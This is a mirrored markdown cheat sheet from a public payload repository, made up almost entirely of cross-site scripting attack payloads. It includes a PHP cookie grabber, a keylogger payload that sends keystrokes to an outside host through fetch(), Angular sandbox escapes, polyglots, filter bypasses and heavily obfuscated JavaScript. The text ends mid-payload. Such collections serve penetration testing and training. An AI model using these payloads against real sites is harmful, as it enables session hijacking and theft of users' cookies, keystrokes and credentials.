mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-21 03:46:10 +00:00
641 lines
23 KiB
Markdown
641 lines
23 KiB
Markdown
# Cross Site Scripting
|
||
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
|
||
|
||
## Exploit code or POC
|
||
|
||
Cookie grabber for XSS
|
||
```
|
||
<?php
|
||
// How to use it
|
||
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
|
||
|
||
// Write the cookie in a file
|
||
$cookie = $_GET['c'];
|
||
$fp = fopen('cookies.txt', 'a+');
|
||
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
|
||
fclose($fp);
|
||
|
||
?>
|
||
```
|
||
|
||
Keylogger for XSS
|
||
```
|
||
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
|
||
```
|
||
|
||
## XSS in HTML/Applications
|
||
XSS Basic
|
||
```
|
||
Basic payload
|
||
<script>alert('XSS')</script>
|
||
<scr<script>ipt>alert('XSS')</scr<script>ipt>
|
||
"><script>alert('XSS')</script>
|
||
"><script>alert(String.fromCharCode(88,83,83))</script>
|
||
|
||
Img payload
|
||
<img src=x onerror=alert('XSS');>
|
||
<img src=x onerror=alert('XSS')//
|
||
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
|
||
<img src=x:alert(alt) onerror=eval(src) alt=xss>
|
||
"><img src=x onerror=alert('XSS');>
|
||
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||
|
||
Svg payload
|
||
<svgonload=alert(1)>
|
||
<svg/onload=alert('XSS')>
|
||
<svg onload=alert(1)//
|
||
<svg/onload=alert(String.fromCharCode(88,83,83))>
|
||
<svg id=alert(1) onload=eval(id)>
|
||
"><svg/onload=alert(String.fromCharCode(88,83,83))>
|
||
"><svg/onload=alert(/XSS/)
|
||
```
|
||
|
||
XSS for HTML5
|
||
```
|
||
<body onload=alert(/XSS/.source)>
|
||
<input autofocus onfocus=alert(1)>
|
||
<select autofocus onfocus=alert(1)>
|
||
<textarea autofocus onfocus=alert(1)>
|
||
<keygen autofocus onfocus=alert(1)>
|
||
<video/poster/onerror=alert(1)>
|
||
<video><source onerror="javascript:alert(1)">
|
||
<video src=_ onloadstart="alert(1)">
|
||
<details/open/ontoggle="alert`1`">
|
||
<audio src onloadstart=alert(1)>
|
||
<marquee onstart=alert(1)>
|
||
```
|
||
|
||
|
||
XSS in META tag
|
||
```
|
||
Base64 encoded
|
||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||
|
||
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
|
||
|
||
With an additional URL
|
||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||
```
|
||
|
||
XSS in flash application
|
||
```
|
||
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
|
||
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
|
||
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
|
||
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
|
||
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
|
||
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
|
||
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
|
||
video-js.swf?readyFunction=alert(1)
|
||
player.swf?playerready=alert(document.cookie)
|
||
player.swf?tracecall=alert(document.cookie)
|
||
banner.swf?clickTAG=javascript:alert(1);//
|
||
io.swf?yid=\"));}catch(e){alert(1);}//
|
||
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
|
||
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
|
||
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
|
||
```
|
||
|
||
XSS in Hidden input
|
||
```
|
||
<input type="hidden" accesskey="X" onclick="alert(1)">
|
||
Use CTRL+SHIFT+X to trigger the onclick event
|
||
```
|
||
|
||
DOM XSS
|
||
```
|
||
#"><img src=/ onerror=alert(2)>
|
||
```
|
||
|
||
## XSS in wrappers javascript and data URI
|
||
XSS with javascript:
|
||
```
|
||
javascript:prompt(1)
|
||
|
||
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
|
||
|
||
javascript:confirm(1)
|
||
|
||
We can encode the "javacript:" in Hex/Octal
|
||
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
|
||
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
|
||
\152\141\166\141\163\143\162\151\160\164\072alert(1)
|
||
|
||
We can use a 'newline character'
|
||
java%0ascript:alert(1) - LF (\n)
|
||
java%09script:alert(1) - Horizontal tab (\t)
|
||
java%0dscript:alert(1) - CR (\r)
|
||
|
||
Using the escape character
|
||
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
|
||
|
||
Using the newline and a comment //
|
||
javascript://%0Aalert(1)
|
||
javascript://anything%0D%0A%0D%0Awindow.alert(1)
|
||
```
|
||
|
||
XSS with data:
|
||
```
|
||
data:text/html,<script>alert(0)</script>
|
||
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
|
||
```
|
||
|
||
XSS with vbscript: only IE
|
||
```
|
||
vbscript:msgbox("XSS")
|
||
```
|
||
## XSS in files
|
||
XSS in XML
|
||
```
|
||
<html>
|
||
<head></head>
|
||
<body>
|
||
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
|
||
</body>
|
||
</html>
|
||
```
|
||
|
||
|
||
XSS in SVG
|
||
```
|
||
<?xml version="1.0" standalone="no"?>
|
||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||
|
||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
||
<script type="text/javascript">
|
||
alert(document.domain);
|
||
</script>
|
||
</svg>
|
||
```
|
||
|
||
XSS in SVG (short)
|
||
```
|
||
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
|
||
```
|
||
|
||
XSS in SWF
|
||
```
|
||
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
|
||
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
|
||
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||
|
||
|
||
InsecureFlashFile.swf
|
||
location to url: InsecureFlashFile.swf?a=location&c=http://www.google.com/
|
||
open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/
|
||
http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/
|
||
eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain)
|
||
```
|
||
|
||
more payloads in ./files
|
||
|
||
|
||
|
||
## XSS with Relative Path Overwrite - IE 8/9 and lower
|
||
|
||
You need these 3 components
|
||
```
|
||
1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
|
||
2) URL Rewriting.
|
||
3) Relative addressing to CSS style sheet : ../style.css
|
||
|
||
```
|
||
|
||
A little example
|
||
```
|
||
http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
|
||
<html>
|
||
<head>
|
||
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
|
||
<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
|
||
</head>
|
||
<body>
|
||
Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
|
||
</body>
|
||
</html>
|
||
```
|
||
|
||
Explanation of the vulnerability
|
||
```
|
||
The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
|
||
|
||
A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
|
||
|
||
Demo 1 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php
|
||
Demo 2 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3
|
||
MultiBrowser : http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php
|
||
|
||
|
||
From : http://www.thespanner.co.uk/2014/03/21/rpo/
|
||
```
|
||
|
||
|
||
## Mutated XSS for Browser IE8/IE9
|
||
```
|
||
<listing id=x><img src=1 onerror=alert(1)></listing>
|
||
<script>alert(document.getElementById('x').innerHTML)</script>
|
||
```
|
||
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
||
|
||
|
||
## XSS in Angular
|
||
Angular 1.6.0
|
||
```
|
||
{{0[a='constructor'][a]('alert(1)')()}}
|
||
```
|
||
|
||
Angular 1.5.9
|
||
```
|
||
{{
|
||
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
|
||
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
|
||
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
|
||
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
|
||
B=C(b,c,b);$evalAsync("
|
||
astNode=pop();astNode.type='UnaryExpression';
|
||
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
|
||
astNode.argument={type:'Identifier',name:'foo'};
|
||
");
|
||
m1=B($$asyncQueue.pop().expression,null,$root);
|
||
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
|
||
$eval('a(b.c)');[].push.apply=a;
|
||
}}
|
||
```
|
||
|
||
Angular 1.5.0 - 1.5.8
|
||
```
|
||
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
|
||
```
|
||
|
||
Angular 1.4.0 - 1.4.9
|
||
```
|
||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
|
||
```
|
||
|
||
Angular 1.3.20
|
||
```
|
||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
|
||
```
|
||
|
||
Angular 1.3.19
|
||
```
|
||
{{
|
||
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
|
||
$eval('x=alert(1)//');
|
||
}}
|
||
```
|
||
|
||
Angular 1.3.3 - 1.3.18
|
||
```
|
||
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||
'a'.constructor.prototype.charAt=[].join;
|
||
$eval('x=alert(1)//'); }}
|
||
```
|
||
|
||
Angular 1.3.1 - 1.3.2
|
||
```
|
||
{{
|
||
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||
'a'.constructor.prototype.charAt=''.valueOf;
|
||
$eval('x=alert(1)//');
|
||
}}
|
||
```
|
||
|
||
Angular 1.3.0
|
||
```
|
||
{{!ready && (ready = true) && (
|
||
!call
|
||
? $$watchers[0].get(toString.constructor.prototype)
|
||
: (a = apply) &&
|
||
(apply = constructor) &&
|
||
(valueOf = call) &&
|
||
(''+''.toString(
|
||
'F = Function.prototype;' +
|
||
'F.apply = F.a;' +
|
||
'delete F.a;' +
|
||
'delete F.valueOf;' +
|
||
'alert(1);'
|
||
))
|
||
);}}
|
||
```
|
||
|
||
Angular 1.2.24 - 1.2.29
|
||
```
|
||
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
|
||
```
|
||
|
||
Angular 1.2.19 - 1.2.23
|
||
```
|
||
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
|
||
```
|
||
|
||
Angular 1.2.6 - 1.2.18
|
||
```
|
||
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
|
||
```
|
||
|
||
Angular 1.2.2 - 1.2.5
|
||
```
|
||
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
|
||
```
|
||
|
||
Angular 1.2.0 - 1.2.1
|
||
```
|
||
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
|
||
```
|
||
|
||
Angular 1.0.1 - 1.1.5
|
||
```
|
||
{{constructor.constructor('alert(1)')()}}
|
||
```
|
||
|
||
## Polyglot XSS
|
||
Polyglot XSS - 0xsobky
|
||
```
|
||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
||
```
|
||
|
||
Polyglot XSS - Ashar Javed
|
||
```
|
||
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
|
||
```
|
||
|
||
Polyglot XSS - Mathias Karlsson
|
||
```
|
||
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
||
```
|
||
|
||
Polyglot XSS - Rsnake
|
||
```
|
||
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
|
||
```
|
||
|
||
Polyglot XSS - Daniel Miessler
|
||
```
|
||
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
|
||
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
|
||
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
|
||
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
|
||
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
|
||
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
|
||
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
|
||
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
|
||
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
|
||
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
|
||
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
|
||
```
|
||
|
||
|
||
## Filter Bypass and exotic payloads
|
||
|
||
Bypass case sensitive
|
||
```
|
||
<sCrIpt>alert(1)</ScRipt>
|
||
```
|
||
|
||
Bypass quotes for string
|
||
```
|
||
String.fromCharCode(88,83,83)
|
||
```
|
||
|
||
Bypass quotes in script tag
|
||
```
|
||
http://localhost/bla.php?test=</script><script>alert(1)</script>
|
||
<html>
|
||
<script>
|
||
<?php echo 'foo="text '.$_GET['test'].'";';`?>
|
||
</script>
|
||
</html>
|
||
```
|
||
|
||
Bypass quotes in mousedown event
|
||
```
|
||
<a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>
|
||
|
||
You can bypass a single quote with ' in an on mousedown event handler
|
||
```
|
||
|
||
Bypass dot filter
|
||
```
|
||
<script>window['alert'](document['domain'])<script>
|
||
```
|
||
|
||
Bypass parenthesis for string - Firefox
|
||
```
|
||
alert`1`
|
||
```
|
||
|
||
Bypass onxxxx= blacklist
|
||
```
|
||
<object onafterscriptexecute=confirm(0)>
|
||
<object onbeforescriptexecute=confirm(0)>
|
||
```
|
||
|
||
Bypass onxxx= filter with a null byte/vertical tab - IE/Safari
|
||
```
|
||
<img src='1' onerror\x00=alert(0) />
|
||
<img src='1' onerror\x0b=alert(0) />
|
||
```
|
||
|
||
Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari
|
||
```
|
||
<img src='1' onerror/=alert(0) />
|
||
```
|
||
|
||
Bypass space filter with "/" - IE/Firefox/Chrome/Safari
|
||
```
|
||
<img/src='1'/onerror=alert(0)>
|
||
```
|
||
|
||
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
|
||
```
|
||
<img src='1' onerror='alert(0)' <
|
||
```
|
||
|
||
Bypass document blacklist
|
||
```
|
||
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
|
||
```
|
||
|
||
Bypass using javascript inside a string
|
||
```
|
||
<script>
|
||
foo="text </script><script>alert(1)</script>";
|
||
</script>
|
||
```
|
||
|
||
Bypass using an alternate way to execute an alert
|
||
```
|
||
<script>window['alert'](0)</script>
|
||
<script>parent['alert'](1)</script>
|
||
<script>self['alert'](2)</script>
|
||
<script>top['alert'](3)</script>
|
||
<script>this['alert'](4)</script>
|
||
<script>frames['alert'](5)</script>
|
||
<script>content['alert'](6)</script>
|
||
|
||
```
|
||
|
||
Bypass using an alternate way to trigger an alert
|
||
```
|
||
var i = document.createElement("iframe");
|
||
i.onload = function(){
|
||
i.contentWindow.alert(1);
|
||
}
|
||
document.appendChild(i);
|
||
|
||
// Bypassed security
|
||
XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
|
||
var proxy = obj[name];
|
||
obj[name] = function () {
|
||
if (exec_original) {
|
||
return proxy.apply(this, arguments);
|
||
}
|
||
};
|
||
XSSObject.lockdown(obj, name);
|
||
};
|
||
XSSObject.proxy(window, 'alert', 'window.alert', false);
|
||
```
|
||
|
||
Bypass ">" using nothing #trololo (you don't need to close your tags)
|
||
```
|
||
<svg onload=alert(1)//
|
||
```
|
||
|
||
Bypass ';' using another character
|
||
```
|
||
'te' * alert('*') * 'xt';
|
||
'te' / alert('/') / 'xt';
|
||
'te' % alert('%') % 'xt';
|
||
'te' - alert('-') - 'xt';
|
||
'te' + alert('+') + 'xt';
|
||
'te' ^ alert('^') ^ 'xt';
|
||
'te' > alert('>') > 'xt';
|
||
'te' < alert('<') < 'xt';
|
||
'te' == alert('==') == 'xt';
|
||
'te' & alert('&') & 'xt';
|
||
'te' , alert(',') , 'xt';
|
||
'te' | alert('|') | 'xt';
|
||
'te' ? alert('ifelsesh') : 'xt';
|
||
'te' in alert('in') in 'xt';
|
||
'te' instanceof alert('instanceof') instanceof 'xt';
|
||
```
|
||
|
||
Bypass using Unicode
|
||
```
|
||
Unicode character U+FF1C FULLWIDTH LESSTHAN SIGN (encoded as %EF%BC%9C) was
|
||
transformed into U+003C LESSTHAN SIGN (<)
|
||
|
||
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
|
||
transformed into U+0022 QUOTATION MARK (")
|
||
|
||
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
||
transformed into U+0027 APOSTROPHE (')
|
||
|
||
Unicode character U+FF1C FULLWIDTH LESSTHAN SIGN (encoded as %EF%BC%9C) was
|
||
transformed into U+003C LESSTHAN SIGN (<)
|
||
|
||
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
|
||
transformed into U+0022 QUOTATION MARK (")
|
||
|
||
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
||
transformed into U+0027 APOSTROPHE (')
|
||
|
||
E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
|
||
%EF%BC%9E becomes >
|
||
%EF%BC%9C becomes <
|
||
```
|
||
|
||
Bypass using Unicode converted to uppercase
|
||
```
|
||
İ (%c4%b0).toLowerCase() => i
|
||
ı (%c4%b1).toUpperCase() => I
|
||
ſ (%c5%bf) .toUpperCase() => S
|
||
K (%E2%84%AA).toLowerCase() => k
|
||
|
||
<ſvg onload=... > become <SVG ONLOAD=...>
|
||
<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>
|
||
```
|
||
|
||
Bypass using overlong UTF-8
|
||
```
|
||
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
|
||
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
|
||
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
|
||
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
|
||
" = %CA%BA
|
||
' = %CA%B9
|
||
```
|
||
|
||
Bypass using UTF-7
|
||
```
|
||
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
|
||
```
|
||
|
||
Bypass using UTF-16be
|
||
```
|
||
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
|
||
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
|
||
```
|
||
|
||
Bypass using UTF-32
|
||
```
|
||
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
|
||
```
|
||
|
||
Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.)
|
||
BOM character allows you to override charset of the page
|
||
```
|
||
BOM Character for UTF-16 Encoding:
|
||
Big Endian : 0xFE 0xFF
|
||
Little Endian : 0xFF 0xFE
|
||
XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
|
||
|
||
BOM Character for UTF-32 Encoding:
|
||
Big Endian : 0x00 0x00 0xFE 0xFF
|
||
Little Endian : 0xFF 0xFE 0x00 0x00
|
||
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
|
||
```
|
||
|
||
|
||
Bypass using weird encoding or native interpretation to hide the payload (alert())
|
||
```javascript
|
||
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
|
||
<img src="1" onerror="alert(1)" />
|
||
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
|
||
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
|
||
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+